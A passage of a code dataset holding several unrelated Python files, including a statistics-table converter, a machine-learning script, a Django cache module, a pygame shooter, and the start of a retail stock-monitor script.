operations)\n\n\"\"\"\n\nfrom databaker.framework import *\nimport pandas as pd\nfrom collections import OrderedDict\n\n\n\n# Codes for where we just have a place name\n# The presence of \"England\" in \"England and Wales\" can cause replacment confusion so using two passes\ncodeNames = OrderedDict({\n \"United Kingdom\":\"K02000001\",\n \"Great Britain\":\"K03000001\",\n \"England and Wales\":\"K04000001\",\n \"Wales / Cymru\":\"W92000004\",\n \"Northern Ireland\":\"N92000002\",\n \"Scotland\":\"S92000003\",\n \"North East\":\"E12000001\",\n \"North West\":\"E12000002\",\n \"Yorkshire and The Humber\":\"E12000003\",\n \"East Midlands\":\"E12000004\",\n \"West Midlands\":\"E12000005\",\n \"London\":\"E12000007\",\n \"South East\":\"E12000008\",\n \"South West\":\"E12000009\"\n })\n\nsmallCodes = OrderedDict({\n \"East\":\"E12000006\",\n \"England\":\"E92000001\",\n })\n\n# probably easier to derive but this keeps the code simpler\n# also, can compare tabs to this for validation\nfindGenderWork = {\n 'All':{'gender':'All', 'work':'All'},\n 'Male':{'gender':'Male', 'work':'All'},\n 'Female':{'gender':'Female', 'work':'All'},\n 'Full-Time':{'gender':'All', 'work':'Full-Time'},\n 'Part-Time':{'gender':'All', 'work':'Part-Time'},\n 'Male Full-Time':{'gender':'Male', 'work':'Full-Time'},\n 'Male Part-Time':{'gender':'Male', 'work':'Part-Time'},\n 'Female Full-Time':{'gender':'Female', 'work':'Full-Time'},\n 'Female Part-Time':{'gender':'Female', 'work':'Part-Time'}\n}\n\nheaders = [\n 'delete1',\n 'Geography',\n 'Number of Jobs (thousands)',\n 'Median',\n 'Annual Percentage Change',\n 'Mean',\n 'Annual Percentage change',\n '10', '20', '25', '30', '40', '60', '70', '75', '80', '90',\n 'drop1', 'drop2', 'drop3'\n]\n\n\n# functions\n\n\n# the number of column headers bring picked up can vary slightly over time\n# nothing serious but + or - 1 junk column does happen. Need to accomdate it\ndef tryHeaders(df, headers):\n\n if len(df.columns.values) < len(headers):\n headers = headers[:-1]\n \n if len(df.columns.values) > len(headers):\n headers.append('dopr4')\n\n return headers\n\n \n \n# get the uqiue descriptor of this spreadsheet\n# i.e ' Get 'Working Pay - Gross' out of the filename 'Work Geography Table 7.1a Weekly pay - Gross 2013.csv' \ndef unique_me(filename):\n filenames = filename.split('.')\n del filenames[0]\n filenames = filenames[0]\n filenames = filenames[3:-5]\n filenames = filenames.strip()\n return filenames\n\n\n# take a clean dataframe of observations and another of CVs and build a v3 output\ndef makeV4(cvDf, df):\n\n obs_file_parts = []\n wanted = [ '10', '20', '25', '30', '40', '60', '70', '75', '80', '90']\n wanted.append('Mean')\n wanted.append('Median')\n \n # get rid of headers\n df = df[4:]\n \n for col in wanted:\n newDf = pd.DataFrame()\n newDf['V4_2'] = df[col]\n newDf['Data_Marking'] = ''\n newDf['CV'] = cvDf[col]\n \n newDf['Time_codelist'] = 'Year'\n newDf['Time'] = df['Time']\n \n newDf['Geography_codelist'] = df['Geography']\n newDf['Geography'] = ''\n \n newDf['Earnings_codelist'] = ''\n newDf['Earnings'] = df['Earnings']\n \n newDf['Gender_codelist'] = ''\n newDf['Gender'] = df['Gender']\n \n newDf['Working Pattern_codelist'] = ''\n newDf['Working Pattern'] = df['Working Pattern']\n \n newDf['Earnings Statistics_codelist'] = ''\n newDf['Earnings Statistics'] = col\n\n obs_file_parts.append(newDf)\n \n obs_file = pd.concat(obs_file_parts)\n obs_file.fillna('', inplace=True)\n \n # remove any blank obs (data makers and obs are still in one column at this point)\n obs_file = obs_file[obs_file['V4_2'].astype(str) != '']\n \n # split obs and data markers\n dMarkers = ['x', '..', ':', '-']\n obs_file['Data_Marking'][obs_file['V4_2'].map(lambda x: x in dMarkers)] = obs_file['V4_2']\n obs_file['V4_2'][obs_file['V4_2'].map(lambda x: x in dMarkers)] = ''\n \n return obs_file\n \n \nimport requests, zipfile, io, sys\n\nz = zipfile.ZipFile(sys.argv[1])\nallFiles = z.namelist()\n\n# get the non cv files for the datasets\nnonCvFiles = [x for x in allFiles if 'CV.' not in x and '.12' not in x and '.13' not in x] # added 12 and 13 as they're getting creative\nhoursFiles = [x for x in nonCvFiles if '.9' in x or '.10' in x or '.11' in x]\nearningsFiles = [x for x in nonCvFiles if '.9' not in x and '.10' not in x and '.11' not in x]\n\n \n \nhoursRun=True\nfor dset in [hoursFiles, earningsFiles]:\n \n doneTabs = []\n for ncf in dset:\n\n # load into databaker\n xl = pd.ExcelFile(z.open(ncf))\n tabs = xl.sheet_names\n\n # clip the year out of the name (last 4 letters not counting the file extension)\n time = ncf.split(' ')[-1][:-4]\n\n for tab in tabs:\n\n if 'notes' not in tab.lower():\n\n # load the current tab into a dataframe\n df = xl.parse(tab)\n \n # headers +/- 1 (some inconsistencies over time)\n df.columns = tryHeaders(df, headers)\n\n # get rid of footer and below\n footer = df[df['delete1'] == 'Not Classified']\n assert len(footer) == 1, \"Cannot find 'Not Classified'. Unable to find end of data table\"\n footY = footer.index[0] # its a tuple-like object (int, type)\n df = df[:footY]\n \n df.fillna('', inplace=True) # get rid of the nans\n\n # Add gender and working pattern\n df['Gender'] = findGenderWork[tab]['gender']\n df['Working Pattern'] = findGenderWork[tab]['work']\n\n # iterate rows\n # TODO = kinda slow\n df['Geography'][df['Geography'] == ''] = df['delete1']\n for code in codeNames.keys():\n df['Geography'] = df['Geography'].map(lambda x: x.replace(code, codeNames[code]))\n \n for code in smallCodes.keys():\n df['Geography'] = df['Geography'].map(lambda x: x.replace(code, smallCodes[code]))\n\n\n # add the time\n df['Time'] = time\n\n # get hours worked\n hoursOrEarnings = unique_me(ncf)\n df['Earnings'] = hoursOrEarnings\n\n \"\"\"\n Use the Special Phrase(i.e \"Weekly Pay Gross\") to split to the table number\n use that to load the CV version of the table\n \"\"\"\n Cvfile = ncf.split(hoursOrEarnings)[0]\n replaceText = Cvfile.split(' ')[-4]\n Cvfile = ncf.replace(replaceText, replaceText.replace('a', 'b'))\n Cvfile = Cvfile.replace('.x', ' CV.x')\n\n # load Cv excel\n xl2 = pd.ExcelFile(z.open(Cvfile))\n cvDf = xl2.parse(tab)\n cvDf = cvDf[4:footer.index[0]]\n cvDf.columns = tryHeaders(cvDf, headers)\n\n\n olDf = df\n\n df = makeV4(cvDf, df)\n\n doneTabs.append(df)\n\n df = pd.concat(doneTabs)\n\n if hoursRun:\n ds = 'Hours'\n hoursRun = False\n else:\n ds = 'Earnings'\n \n if 'provisional' in sys.argv[1].lower():\n prov = '_Provisional_'\n else:\n prov = ''\n \n df.to_csv('ASHE_7_{ds}{p}{t}.csv'.format(ds=ds, t=time, p=prov), encoding=\"utf-8\", index=False)\n","sub_path":"ASHE Table 7/ASHE7.py","file_name":"ASHE7.py","file_ext":"py","file_size_in_byte":8268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"459609723","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 22 12:33:09 2018\n\n@author: raghebal-ghezi\n\"\"\"\nimport itertools\nimport numpy as np\nimport pandas as pd\nfrom sklearn import linear_model\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\n\n\n#pickled Pandas DataFrame that has the following cols:\n# ['candid', 'const_tags', 'constituents', 'cosine_2', \n# 'cosine_3', 'left_span', 'question', 'right_span', \n# 'span_length', 'text', 'wh+tag', 'target', 'tfidf_sum', \n# 'tfidf_sum_2', 'tfidf_sum_3', 'glove_cos_2']\ndf = pd.read_pickle('serialized_df.pkl')\n\n\ndf_feature = pd.DataFrame() #to store the features\n#try:\nprint(\"Generating features ...... (1 of 5)\")\nfor i,j in enumerate(df.cosine_2): # prepare features for Contextual Overlap with window size 2\n for k,l in enumerate(j):\n if k < 31:\n df_feature.loc[i, \"column_cos2_\"+\"%s\"%k] = l\nprint(\"Generating features ...... (2 of 5)\")\nfor i,j in enumerate(df.cosine_3): # prepare features for Contextual Overlap with window size 3\n for k,l in enumerate(j):\n if k < 31:\n df_feature.loc[i, \"column_cos3_\"+\"%s\"%k] = l\nprint(\"Generating features ...... (3 of 5)\") \nfor i,j in enumerate(df.tfidf_sum_2):# sum of tfidf values for Contextual Overlap with window size 2\n for k,l in enumerate(j):\n if k < 31:\n df_feature.loc[i, \"column_tfidf2_\"+\"%s\"%k] = l\nprint(\"Generating features ...... (4 of 5)\") \nfor i,j in enumerate(df.tfidf_sum_3): # sum of tfidf values for Contextual Overlap with window size 3\n for k,l in enumerate(j):\n if k < 31:\n df_feature.loc[i, \"column_tfidf3_\"+\"%s\"%k] = l\nprint(\"Generating features ...... (5 of 5)\")\nfor i,j in enumerate(df.glove_cos_2): # distributional cos sim\n for k,l in enumerate(j):\n if k < 31:\n df_feature.loc[i, \"column_gloveCos_\"+\"%s\"%k] = l\n\n# Appending the remaining features from original dataframe\ndf_feature['wh+tag'] = df['wh+tag'] \ndf_feature['left_span'] = df['left_span']\ndf_feature['right_span'] = df['right_span']\ndf_feature['span_length'] = df['span_length']\ndf_feature['target'] = df.target\n\n# restricting the number of target constituents to 30\ntrain_final = df_feature[df_feature['target'] < 31]\n\n# filling in missing values with zeros\ntrain_final = train_final.fillna(0)\n\n# enforcing the datatype to 'wh+tag' \ntrain_final['wh+tag'] = train_final['wh+tag'].map(lambda x:str(x).lower())\n#fixing the indices of dataframe\ntrain_final = train_final.reset_index(drop=True)\n\n# encoding the 'wh+tag' to numerical values\nle = preprocessing.LabelEncoder()\ntrain_final['wh+tag'] = le.fit_transform(train_final['wh+tag'])\n\n# assigning X and y\nX = train_final.drop('target',axis=1)\ny = train_final['target']\n\n# splitting and Shuffling\ntrain_x, test_x, train_y, test_y = train_test_split(X,y, train_size=0.7, random_state = 5,shuffle=True)\n# Using LR with Newton methods optimizer\nmul_lr = linear_model.LogisticRegression(random_state=0, solver='newton-cg',multi_class='multinomial',n_jobs=-1)\nmul_lr.fit(train_x, train_y)\n\n# Printing Classification Report\nprint(classification_report(test_y, mul_lr.predict(test_x), labels=np.unique(mul_lr.predict(test_x))))\n\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\", fontsize=2)\n\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.savefig('fig_1.pdf')\n\n\n# Compute confusion matrix\ncnf_matrix = confusion_matrix(test_y, mul_lr.predict(test_x), labels=[i for i in range(0,30)])\nnp.set_printoptions(precision=2)\n\n# Plot normalized confusion matrix\nplt.figure()\nplot_confusion_matrix(cnf_matrix, classes=np.unique(mul_lr.predict(test_x)),\n title='Confusion matrix, with normalization', normalize=True)","sub_path":"squad2_hw4.py","file_name":"squad2_hw4.py","file_ext":"py","file_size_in_byte":4887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"247616802","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Author : LEITENG\n@Version : \n------------------------------------\n@File : p23_GD2_sqrt.py\n@Description : \n@CreateTime : 2020/6/9 17:16\n------------------------------------\n@ModifyTime : GD2\n\"\"\"\n\n\ndef sqrt(n, lr=0.001, epoches=2000):\n y = lambda x: x**2\n # loss = lambda x: (y(x) - n)**2\n dloss_x = lambda x: 2*(y(x) - n) * 2 * x\n dx = lambda x, lr: -lr * dloss_x(x)\n\n x = 1\n for _ in range(epoches):\n x += dx(x, lr)\n return x\n\n\ndef main():\n for i in range(11):\n print('sqrt(%s) = %f' % (i, sqrt(i)))\n\n\nif __name__ == '__main__':\n main()","sub_path":"deeplearning_tensorflow_p/p23_GD2_sqrt.py","file_name":"p23_GD2_sqrt.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"37622049","text":"import inspect\nimport hashlib\nimport cPickle as pickle\nfrom django.db.models.query import QuerySet\nfrom functools import wraps\nfrom avocado.conf import settings\nfrom .proxy import CacheProxy\n\nNEVER_EXPIRE = 60 * 60 * 24 * 30 # 30 days\nCACHE_KEY_FUNC = lambda l: ':'.join([str(x) for x in l])\n\n\ndef _pickling_value(v):\n \"Returns value for pickling given the value.\"\n if isinstance(v, QuerySet):\n return v.query\n\n return v\n\n\ndef _prep_pickling(args, kwargs):\n \"Prepares the positional and keyword arguments for pickling.\"\n if args:\n args = [_pickling_value(v) for v in args]\n else:\n args = None\n\n _kwargs = {}\n\n if kwargs:\n for k, v in kwargs.items():\n if v is not None:\n _kwargs[k] = _pickling_value(v)\n\n kwargs = _kwargs or None\n else:\n kwargs = None\n\n return args, kwargs\n\n\ndef instance_cache_key(instance, label=None, version=None,\n args=None, kwargs=None):\n \"\"\"Creates a cache key for the instance with an optional label and version.\n The instance is uniquely defined based on the app, model and primary key of\n the instance.\n\n A `label` is used to differentiate cache for an instance.\n\n The `version` can be a scalar (i.e. a string or int), a function, instance\n property or method.\n \"\"\"\n if version is None:\n version = '-'\n elif callable(version):\n version = version(instance, label=label)\n elif hasattr(instance, version):\n version = getattr(instance, version)\n if callable(version):\n version = version()\n\n opts = instance._meta\n key = [opts.app_label, opts.module_name, instance.pk, version]\n\n if label is not None:\n key.append(label)\n\n args, kwargs = _prep_pickling(args, kwargs)\n\n if args or kwargs:\n sha1 = hashlib.sha1(pickle.dumps((args, kwargs))).hexdigest()\n key.append(sha1)\n\n return CACHE_KEY_FUNC(key)\n\n\ndef cached_method(func=None, version=None, timeout=NEVER_EXPIRE,\n key_func=instance_cache_key):\n \"Wraps a method and caches the output indefinitely.\"\n\n def decorator(func):\n # Single cache proxy shared across all instances. All methods require\n # the instance to be passed.\n cache_proxy = CacheProxy(func, version, timeout, key_func)\n\n @wraps(func)\n def inner(self, *args, **kwargs):\n # This check is here to be ensure transparency of the augmented\n # methods below. The agumented methods will be a no-op since the\n # `func_self` will never be set as long as this condition is true.\n if not settings.DATA_CACHE_ENABLED:\n return func(self, *args, **kwargs)\n\n return cache_proxy.get_or_set(self, args=args, kwargs=kwargs)\n\n def flush(instance, args=None, kwargs=None):\n return cache_proxy.flush(instance, args, kwargs)\n\n def cached(instance, args=None, kwargs=None):\n return cache_proxy.cached(instance, args, kwargs)\n\n def cache_key(instance, args=None, kwargs=None):\n return cache_proxy.cache_key(instance, args, kwargs)\n\n inner.flush = flush\n inner.cached = cached\n inner.cache_key = cache_key\n\n return inner\n\n if inspect.isfunction(func):\n return decorator(func)\n return decorator\n","sub_path":"charlies_revenge/lib/python2.7/site-packages/avocado/core/cache/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"408884380","text":"\"\"\" \nToolbox4: Revise MiniProject2\n# created on Thu Dec 10 21:48 2015\n# @author: YeongHwa Kim\n\nI revised \"build_random_function\" and \"evaluate_random_function\".\n\"\"\"\nimport random \nfrom PIL import Image\nimport math\n\n# Definition for the calculating unit functions\n# Input and Output: numbers(float)\ndef prod(a, b):\n\treturn float(ab)\ndef cos_pi(a):\n\treturn float(math.cos(math.pi*a))\ndef sin_pi(a):\n\treturn float(math.sin(math.pi*a))\ndef X(a, b):\n\treturn float(a)\ndef Y(a, b):\n\treturn float(b)\n\n# Definition for random function building function\n# Input: the possible range of the depth for function(int)\n# Output: the list of functions(list)\ndef build_random_function(min_depth, max_depth):\n\tdep = random.randint(min_depth, max_depth)\n\t\t\n\tunit = [[\"x\"], [\"y\"]]\n\tbuilding_block = [[\"prod\", [\"a\"], [\"b\"]], [\"cos_pi\", [\"a\"]], [\"sin_pi\", [\"a\"]]]\n\n\tif dep == 1:\n\t\treturn random.choice(unit)\n\telse:\n\t\toutlist = random.choice(building_block)\n\t\tif outlist[0] == \"cos_pi\" or outlist[0] == \"sin_pi\" :\n\t\t\tdep = dep -1\n\t\t\toutlist[1] = build_random_function(1, dep)\n\t\t\treturn outlist\n\t\telse:\n\t\t\tdep = dep - 1\n\t\t\toutlist[1] = build_random_function(1, dep)\n\t\t\toutlist[2] = build_random_function(1, dep)\n\t\t\treturn outlist\n\n# Definition for evaluating function\n# Input1: list of functions which wants to calculate(list)\n# Input2: input value for x(float)\n# Input3: input value for y(float) \n# Output: mathematically calculated value(float)\ndef evaluate_random_function(random_function, x, y):\n\touter_function = random_function\n\tlength = len(random_function)\n\tif length == 1:\n\t\tif outer_function[0] == \"x\":\n\t\t\treturn X(x, y)\n\t\telif outer_function[0] == \"y\":\n\t\t\treturn Y(x, y)\n\n\telse:\n\t\tif outer_function[0] == \"cos_pi\":\n\t\t\tinner_function = outer_function[1]\n\t\t\treturn cos_pi(evaluate_random_function(inner_function, x, y))\n\t\t\t\n\t\tif outer_function[0] == \"sin_pi\":\n\t\t\tinner_function = outer_function[1]\n\t\t\treturn sin_pi(evaluate_random_function(inner_function, x, y))\n\t\t\t\n\t\tif random_function[0] == \"prod\": \n\t\t\tinner_function1 = outer_function[1]\n\t\t\tinner_function2 = outer_function[2]\n\t\t\ta = evaluate_random_function(inner_function1, x, y)\n\t\t\tb = evaluate_random_function(inner_function2, x, y)\n\t\t\treturn a*b\n\n# Definition for interval remapping function\n# Input1: the value that want to remap in different interval(float)\n# Input2: the value that initial interval starts(float)\n# Input3: the value that initial interval ends(float)\n# Input4: the value that changed interval starts(float)\n# Input5: the value that changed interval ends(float)\n# Output: remapped \"val\"\ndef remap_interval(val, input_interval_start, input_interval_end, output_interval_start, ouput_interval_end):\n\ta = float(output_interval_start)\n\tb = float(val - input_interval_start)\n\tc = float(ouput_interval_end - output_interval_start)\n\td = float(input_interval_end - input_interval_start)\n\tlol = a+b*c/d\n\treturn lol\n\n\n# Making RGB value\n\n# Make random function for the R, G, B values\nfuncR = build_random_function(1, 8)\nfuncG = build_random_function(2, 4)\nfuncB = build_random_function(5, 9)\n\n# lists of x, y values in range from -1 to 1\nx_values = []\nfor i in range(350):\n\ta = remap_interval(i, 0, 350, -1, 1)\n\tx_values.append(a)\n\ny_values = []\nfor i in range(350):\n\ta = remap_interval(i, 0, 350, -1, 1)\n\ty_values.append(a)\n\n# Definition of function that calculate the RGB values\n# Input: the x, y coordinates(int)\n# Output: RGB value(tuple)\ndef extractRGB(i, j):\n\tR = evaluate_random_function(funcR, x_values[i], y_values[j])\n\tR = int(remap_interval(R, -1, 1, 0, 255))\n\tG = evaluate_random_function(funcG, x_values[i], y_values[j])\n\tG = int(remap_interval(G, -1, 1, 0, 255))\n\tB = evaluate_random_function(funcB, x_values[i], y_values[j])\n\tB = int(remap_interval(B, -1, 1, 0, 255))\n\treturn R, G, B\n\n# Make the image\nim = Image.new(\"RGB\", (350, 350))\nfor i in range(350):\n\tfor j in range(350):\n\t\tim.putpixel((i, j),extractRGB(i, j))\nim.save('openplease.png')","sub_path":"toolbox/MP2_revise.py","file_name":"MP2_revise.py","file_ext":"py","file_size_in_byte":3910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"549880731","text":"\"\"\"empty message\n\nRevision ID: da480f231142\nRevises: 0e0a38cb41aa\nCreate Date: 2019-03-21 10:24:09.610576\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'da480f231142'\ndown_revision = '4f3e25700ad5'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('timezone',\n sa.Column('timezone_id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('timezone_name', sa.String(length=256), nullable=False),\n sa.PrimaryKeyConstraint('timezone_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('timezone')\n # ### end Alembic commands ###\n","sub_path":"api/migrations/versions/da480f231142_.py","file_name":"da480f231142_.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"77831229","text":"import pygame\nimport random\nimport re\nfrom main import *\n\n# 屏幕大小\nSCREEN_RECT = pygame.Rect(0, 0, 480, 700)\n# 刷新帧率\nFRAME_PER_SEC = 60\n# 创建敌机的定时器常量\nCREATE_ENEMY_EVENT = pygame.USEREVENT\n# 发射子弹定时器\nHERO_FIRE_EVENT = pygame.USEREVENT + 1\n\n\nclass GameSprite(pygame.sprite.Sprite):\n \"\"\"飞机大战游戏精灵\"\"\"\n\n def __init__(self, image_name, speed=1):\n # 调用父类的初始化方法\n super().__init__()\n\n # 定义对象的属性\n self.image = pygame.image.load(image_name)\n self.rect = self.image.get_rect()\n self.speed = speed\n\n def update(self):\n # 在屏幕的垂直方向上移动\n self.rect.y += self.speed\n # if self.rect.y > 700:\n # self.rect.y = -42\n\n\nclass Background(GameSprite):\n \"\"\"背景精灵\"\"\"\n\n def __init__(self, is_alt=False):\n # 调用父类方法\n super().__init__(\"../images/background.png\")\n # 判断是否是��替图像,并设置初始位置\n if is_alt:\n self.rect.y = -self.rect.height\n\n def update(self):\n # 调用父类方法实现\n super().update()\n # 判断是否移出屏幕,并更新位置\n if self.rect.y >= SCREEN_RECT.height:\n self.rect.y = -self.rect.height\n\n\nclass Enemy(GameSprite):\n def __init__(self, enemy_type, speed, hp):\n # 调用父类\n super().__init__(enemy_type, speed)\n # 敌机速度\n # self.speed = random.randint(1, 3)\n\n self.enemy_type = int(re.search(r\"enemy(\\d)\", enemy_type).group(1))\n\n # 敌机位置\n self.rect.bottom = 0\n max_x = SCREEN_RECT.width - self.rect.width\n self.rect.x = random.randint(0, max_x)\n self.HP = hp\n\n self.boom_image_list0 = []\n self.boom_image_list1 = []\n self.boom_image_list2 = []\n self.boom_image_index = 1\n self.__get_boom_image()\n self.isboom = False\n self.time = 0\n\n def update(self):\n # 调用父类\n super().update()\n # 敌机飞出并删除\n if self.rect.y >= SCREEN_RECT.height:\n self.kill()\n # self.__del__()\n # self.isboom = True\n # 判断敌机血量\n if self.HP <= 0:\n self.speed = 0\n self.isboom = True\n\n def boom(self, screen):\n x = [(self.boom_image_list0, self.boom_image_length0),\n (self.boom_image_list1, self.boom_image_length1),\n (self.boom_image_list2, self.boom_image_length2)]\n\n # if self.boom_image_index == x[self.enemy_type - 1][1]:\n # return 1\n\n boom_image = x[self.enemy_type-1][0][self.boom_image_index-1]\n screen.blit(boom_image, (self.rect.x, self.rect.y))\n if self.time > 15:\n self.boom_image_index += 1\n self.time -= 15\n if self.boom_image_index-1 == x[self.enemy_type-1][1]:\n return 1\n else:\n self.time += 1\n\n def __get_boom_image(self):\n for i in range(1, 5):\n self.boom_image_list0.append(\n pygame.image.load(\"../images/enemy1_down\" + str(i) + \".png\"))\n self.boom_image_list1.append(\n pygame.image.load(\"../images/enemy2_down\" + str(i) + \".png\"))\n for i in range(1, 7):\n self.boom_image_list2.append(\n pygame.image.load(\"../images/enemy3_down\" + str(i) + \".png\"))\n self.boom_image_length0 = len(self.boom_image_list0)\n self.boom_image_length1 = len(self.boom_image_list1)\n self.boom_image_length2 = len(self.boom_image_list2)\n\n def __del__(self):\n pass\n\n\nclass Hero(GameSprite):\n \"\"\"英雄精灵\"\"\"\n\n def __init__(self):\n super().__init__(\"../images/me1.png\", speed=0)\n self.rect.centerx = SCREEN_RECT.centerx\n self.rect.bottom = SCREEN_RECT.height - 100\n\n # 创建子弹精灵组\n self.bullets = pygame.sprite.Group()\n self.bullet = Bullet()\n self.boom_image_list = []\n self.boom_image_index = 1\n self.__get_boom_images()\n self.isboom = False\n self.time = 0\n\n def update(self):\n # 水平移动\n self.rect.x += self.speed\n if self.rect.left < -3:\n self.rect.left = -3\n elif self.rect.right > SCREEN_RECT.right + 3:\n self.rect.right = SCREEN_RECT.right + 3\n\n def fire(self):\n if self.isboom:\n return\n # 创建子弹精灵\n bullet = Bullet()\n # 设置精灵的位置\n bullet.rect.bottom = self.rect.y + 5\n bullet.rect.centerx = self.rect.centerx\n # 降精灵添加到精灵组\n self.bullets.add(bullet)\n\n def boom(self, screen):\n boom_image = self.boom_image_list[self.boom_image_index - 1]\n screen.blit(boom_image, (self.rect.x, self.rect.y))\n if self.time > 15:\n self.boom_image_index += 1\n self.time -= 15\n if self.boom_image_index-1 == self.boom_image_length:\n return 1\n else:\n self.time += 1\n\n def __get_boom_images(self):\n for i in range(1, 5):\n self.boom_image_list.append(\n pygame.image.load(\"../images/me_destroy_\" + str(i) + \".png\"))\n self.boom_image_length = len(self.boom_image_list)\n\n\nclass Bullet(GameSprite):\n \"\"\"子弹精灵\"\"\"\n\n def __init__(self):\n super().__init__(\"../images/bullet1.png\", speed=-2)\n\n def update(self):\n # 调用父类,垂直飞行\n super().update()\n # 是否飞出屏幕\n self.rect.y += self.speed\n if self.rect.bottom < 0:\n self.kill()\n\n def __del__(self):\n pass\n","sub_path":"2.0/plane_sprites.py","file_name":"plane_sprites.py","file_ext":"py","file_size_in_byte":5743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"244324379","text":"import os\nfrom UserDict import IterableUserDict\n\nimport yaml\n\n\ndef recursive_dict_update(d, u):\n \"\"\"http://stackoverflow.com/a/3233356/148585\"\"\"\n for k, v in u.iteritems():\n if isinstance(v, dict):\n r = recursive_dict_update(d.get(k, {}), v)\n d[k] = r\n else:\n d[k] = u[k]\n return d\n\n\nclass Settings(IterableUserDict):\n def __init__(self, path):\n self.path = path\n self.data = {}\n\n self._load_defaults()\n self._load_file(self.path)\n\n def _load_file(self, path):\n if not os.path.exists(path):\n return False\n with open(path) as fp:\n recursive_dict_update(self.data, yaml.safe_load(fp))\n return True\n\n def _load_defaults(self):\n self.data = yaml.safe_load('''\n channels:\n - '#sourcemod'\n - '#yakbot'\n network:\n host: irc.gamesurge.net\n port: 6667\n nickname: yakbot\n plugins:\n - smapi\n - smbugs\n - smplugins\n - steamid\n - zachbraffquotes\n reply-with-name: true\n ''')\n\n def _save_to_file(self, path):\n with open(path, 'w') as fp:\n fp.write(yaml.safe_dump(self.data, default_flow_style=False))\n\n def flush(self):\n self._save_to_file(self.path)\n\n def __setitem__(self, key, value):\n IterableUserDict.__setitem__(self, key, value)\n self.flush()\n\n def update(self, dict=None, **kwargs):\n IterableUserDict.update(self, dict, **kwargs)\n self.flush()\n","sub_path":"yakbot/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"526771918","text":"import doctest\n\n\ndef solve(num):\n \"\"\"\n >>> solve(123)\n 27\n >>> solve(13)\n 7\n >>> solve(0)\n 0\n \"\"\"\n decimal = 0\n strnum = str(num)\n pow = len(strnum) - 1\n for i in range(len(strnum)):\n decimal += int(strnum[i]) * (4 ** pow)\n pow -= 1\n return decimal\n\n\nif __name__ == '__main__':\n doctest.testmod()\n print(solve(int(input())))\n","sub_path":"2016_summer/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"440337936","text":"#!/usr/bin/env python3\nimport json\nfrom json.decoder import JSONDecoder\nimport requests\nfrom bs4 import BeautifulSoup\nfrom os import link\nfrom random_user_agent.params import SoftwareName, HardwareType\nfrom random_user_agent.user_agent import UserAgent\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\nfrom urllib.parse import urlunsplit, urlencode\nimport requests as rq\nimport time\nimport json\nimport logging\nimport dotenv\nimport urllib3\nfrom datetime import datetime, timedelta\nfrom requests_html import HTMLSession\n\n\n\"\"\"\nlogs\n\"\"\"\nlogging.basicConfig(filename='MonitoLog.log', filemode='a', format='%(asctime)s - %(name)s - %(message)s',\n level=logging.DEBUG)\n\"\"\"\nconfigurations\n\"\"\"\nhardware_type = [HardwareType.MOBILE__PHONE]\nsoftware_names = [SoftwareName.CHROME.value]\n\nuser_agent_rotator = UserAgent(software_names=software_names, hardware_type=hardware_type)\nCONFIG = dotenv.dotenv_values()\n\nurl=\"https://www.zalando.fr/nike-sportswear-dunk-baskets-basses-yellow-strikewhite-ni111a0y9-e11.html\"\ncontentstring = \"le contenu attendu\"\n\nheaders = {\n\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \n\"Accept-Encoding\": \"gzip, deflate\", \n\"Accept-Language\": \"en-GB,en-US;q=0.9,en;q=0.8\", \n\"Dnt\": \"1\", \n\"Host\": \"www.zalando.fr\", \n\"Upgrade-Insecure-Requests\": \"1\", \n\"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36\", \n\"X-Amzn-Trace-Id\": 